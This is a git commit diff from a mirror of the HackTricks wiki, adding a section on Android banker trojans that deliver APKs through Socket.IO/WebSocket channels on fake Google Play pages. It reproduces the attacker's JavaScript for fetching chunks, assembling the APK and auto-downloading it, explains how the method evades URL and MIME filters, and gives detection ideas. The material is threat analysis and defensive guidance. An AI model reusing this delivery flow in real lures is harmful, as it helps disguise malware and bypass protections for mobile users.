mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1434 from HackTricks-wiki/update_Banker_Trojan_Targeting_Indonesian_and_Vietnamese__20250925_124652
Banker Trojan Targeting Indonesian and Vietnamese Android Us...
This commit is contained in:
commit
b5877a948f
@ -222,6 +222,49 @@ public void onMessageReceived(RemoteMessage msg){
|
||||
|
||||
---
|
||||
|
||||
## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages
|
||||
|
||||
Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX.
|
||||
|
||||
Typical client flow observed in the wild:
|
||||
|
||||
```javascript
|
||||
// Open Socket.IO channel and request payload
|
||||
const socket = io("wss://<lure-domain>/ws", { transports: ["websocket"] });
|
||||
socket.emit("startDownload", { app: "com.example.app" });
|
||||
|
||||
// Accumulate binary chunks and drive fake Play progress UI
|
||||
const chunks = [];
|
||||
socket.on("chunk", (chunk) => chunks.push(chunk));
|
||||
socket.on("downloadProgress", (p) => updateProgressBar(p));
|
||||
|
||||
// Assemble APK client‑side and trigger browser save dialog
|
||||
socket.on("downloadComplete", () => {
|
||||
const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" });
|
||||
const url = URL.createObjectURL(blob);
|
||||
const a = document.createElement("a");
|
||||
a.href = url; a.download = "app.apk"; a.style.display = "none";
|
||||
document.body.appendChild(a); a.click();
|
||||
});
|
||||
```
|
||||
|
||||
Why it evades simple controls:
|
||||
- No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames.
|
||||
- URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO.
|
||||
- Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload.
|
||||
|
||||
Hunting and detection ideas:
|
||||
- Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `<a download>` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts.
|
||||
- Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events.
|
||||
- Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts.
|
||||
|
||||
See also WebSocket tradecraft and tooling:
|
||||
|
||||
{{#ref}}
|
||||
../../pentesting-web/websocket-attacks.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
|
||||
|
||||
The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques.
|
||||
@ -394,5 +437,8 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new
|
||||
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
|
||||
- [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
|
||||
- [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
|
||||
- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/)
|
||||
- [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN)
|
||||
- [Socket.IO](https://socket.io)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user